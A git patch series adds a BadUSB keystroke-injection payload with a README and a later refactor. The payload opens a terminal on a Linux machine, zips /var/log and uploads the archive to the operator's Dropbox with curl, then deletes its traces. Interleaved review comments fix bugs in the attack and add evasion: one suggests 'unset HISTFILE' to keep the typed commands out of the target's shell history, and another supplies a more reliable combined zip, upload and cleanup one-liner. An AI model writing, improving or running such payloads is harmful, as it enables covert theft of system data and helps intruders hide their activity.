From cf4f91d1c386de736989b8a743dbf32e2912b2c9 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 12 Jun 2023 11:50:22 +0200
Subject: [PATCH 1/3] Exfiltrate Linux Logs With Dropbox
---
 .../ExfiltrateLinuxLogFiles/payload.txt | 80 +++++++++++++++++++
 1 file changed, 80 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
new file mode 100644
index 0000000..dbd546f
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -0,0 +1,80 @@
+REM ######################################################
+REM # |
+REM # Title : Exfiltrate Linux Logs With Dropbox |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Exfiltration, Execution |
+REM # Target : Linux |
+REM # |
+REM ######################################################
+
+REM Requirements:
+REM - Internet Connection
+REM - Dropbox Account
+REM - - DROPBOX_ACCESS_TOKEN
+
+
+DELAY 1000
+CTRL-ALT t
+
+REM Required: Set here your Dropbox access TOKEN
+DELAY 2000
+DEFINE TOKEN example
+STRING ACCESS_TOKEN="
+STRING TOKEN
+STRING "
+ENTER
+
+
+DELAY 500
+STRING USER_NAME=$(whoami)
+ENTER
+
+REM Create random num
+DELAY 500
+STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
+ENTER
+
+REM Folder path
+DELAY 500
+STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
+ENTER
+
+REM Zip path
+DELAY 500
+STRING ZIP_NAME="$RANDOM.zip"
+ENTER
+DELAY 500
+STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
+ENTER
+
+REM Default log path
+DELAY 500
+STRING LOG_PATH="/var/log/"
+ENTER
+
+DELAY 500
+STRING zip -r "$ZIP_PATH" "$LOG_PATH"
+ENTER
+
+REM Delay of zipping operation - it depends
+DELAY 10000
+
+DELAY 500
+STRING DROPBOX_FOLDER="/$ZIP_NAME"
+ENTER
+
+REM Send to Dropbox function
+DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
+DELAY 500
+STRING curl -X POST
+STRING DROPBOX_API_LINK
+STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
+ENTER
+
+REM Send timing - it depends
+DELAY 5000
+
+DELAY 500
+STRING rm -rf "$TMP_FOLDER_PATH"
+ENTER
From 372e44e3896b74eb4c11beca2f28f19e8348e686 Mon Sep 17 00:00:00 2001
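Review bot: `STRING RANDOM=$(shuf -i 1-999999999999 -n 1)` assigns to bash's (and zsh's) special `RANDOM` variable, which only reseeds its generator, so the later `STRING ZIP_NAME="$RANDOM.zip"` expands to a fresh 0–32767 value and the shuf call is dead weight. Rename it, e.g. `STRING RAND_ID=$(shuf -i 1-999999999999 -n 1)` and `STRING ZIP_NAME="$RAND_ID.zip"`. `mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX` also assumes that directory already exists and that the home lives under /home; when it does not, mktemp fails, `TMP_FOLDER_PATH` is empty and the archive path becomes `/<n>.zip`, which a plain `STRING TMP_FOLDER_PATH=$(mktemp -d)` avoids.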
From: aleff-github
Date: Mon, 12 Jun 2023 11:51:00 +0200
Subject: [PATCH 2/3] Create README.md
---
 .../ExfiltrateLinuxLogFiles/README.md | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
new file mode 100644
index 0000000..1ea1e56
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
@@ -0,0 +1,33 @@
+
+# Exfiltrate Linux Log Files - BADUSB ✅
+
+A script used to take linux logs.
+
+**Category**: Exfiltration, Execution
+
+[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
+
+## Description
+
+A script used to take linux logs.
+
+Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Linux System
+* * Terminal that can be opened by the shortcommand CTRL-ALT t
+* DropBox Account for the access token
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set your dropbox access token
+* Change if needed the folder path interessed (i.e. /var/log)
+* Change (if you think that it is necessary) the delay of the zipping operation
From 16d005ea73a11d8013e6623c9053e8a796993a86 Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:47:26 -0400
Subject: [PATCH 3/3] Update payload.txt
---
 .../ExfiltrateLinuxLogFiles/payload.txt | 56 +++++--------------
 1 file changed, 15 insertions(+), 41 deletions(-)
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
index dbd546f..d5e9912 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -13,68 +13,42 @@ REM - Internet Connection REM - Dropbox Account REM - - DROPBOX_ACCESS_TOKEN +DEFINE #TOKEN example +DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload -DELAY 1000 -CTRL-ALT t +DEFAULT_DELAY 500 +CTRL ALT t REM Required: Set here your Dropbox access TOKEN DELAY 2000 -DEFINE TOKEN example -STRING ACCESS_TOKEN=" -STRING TOKEN -STRING " -ENTER +STRINGLN ACCESS_TOKEN="#TOKEN" - -DELAY 500 -STRING USER_NAME=$(whoami) -ENTER +STRINGLN USER_NAME=$(whoami) REM Create random num -DELAY 500 -STRING RANDOM=$(shuf -i 1-999999999999 -n 1) -ENTER +STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1) REM Folder path -DELAY 500 -STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX) -ENTER +STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX) REM Zip path -DELAY 500 -STRING ZIP_NAME="$RANDOM.zip" -ENTER -DELAY 500 -STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME" -ENTER +STRINGLN ZIP_NAME="$RANDOM.zip" +STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME" REM Default log path -DELAY 500 -STRING LOG_PATH="/var/log/" -ENTER +STRINGLN LOG_PATH="/var/log/" -DELAY 500 -STRING zip -r "$ZIP_PATH" "$LOG_PATH" -ENTER +STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH" REM Delay of zipping operation - it depends DELAY 10000 -DELAY 500 -STRING DROPBOX_FOLDER="/$ZIP_NAME" -ENTER +STRINGLN DROPBOX_FOLDER="/$ZIP_NAME" REM Send to Dropbox function -DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload -DELAY 500 -STRING curl -X POST -STRING DROPBOX_API_LINK -STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" -ENTER +STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" 
--header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" REM Send timing - it depends DELAY 5000 -DELAY 500 -STRING rm -rf "$TMP_FOLDER_PATH" -ENTER +STRINGLN rm -rf "$TMP_FOLDER_PATH"
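Review bot: The Dropbox token is typed into an interactive shell and then placed on the `curl` command line in `STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" ...`, so it is persisted in the target user's shell history file and is readable by any local user through `ps` while the upload runs — whoever recovers it holds the operator's Dropbox credential. Add `STRINGLN unset HISTFILE` once the terminal is open, before `STRINGLN ACCESS_TOKEN="#TOKEN"`, so nothing the payload types is written to history, and treat the token as disposable after each run. The fixed `DELAY 10000` and `DELAY 5000` are also guesses: on a large or slow `/var/log` curl starts uploading a half-written archive or `rm -rf` removes it mid-upload, and `rm -rf "$TMP_FOLDER_PATH"` still runs when `mktemp` failed and left the variable empty. Chaining archive, upload and cleanup into one line removes the timing dependency; because zip can exit non-zero after skipping the root-only entries under /var/log, the upload is gated on the archive existing rather than on zip's exit status, and `${TMP_FOLDER_PATH:?}` aborts instead of running rm with an empty path.
```duckyscript
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
REM Keep the token and every command typed below out of the target's shell history
STRINGLN unset HISTFILE
REM … unchanged: ACCESS_TOKEN, USER_NAME, RANDOM, TMP_FOLDER_PATH, ZIP_NAME, ZIP_PATH, LOG_PATH and DROPBOX_FOLDER assignments …
REM Upload only if the archive was written, then always clean up; replaces the fixed DELAY 10000 / DELAY 5000
STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"; [ -s "$ZIP_PATH" ] && curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"; rm -rf "${TMP_FOLDER_PATH:?}"
```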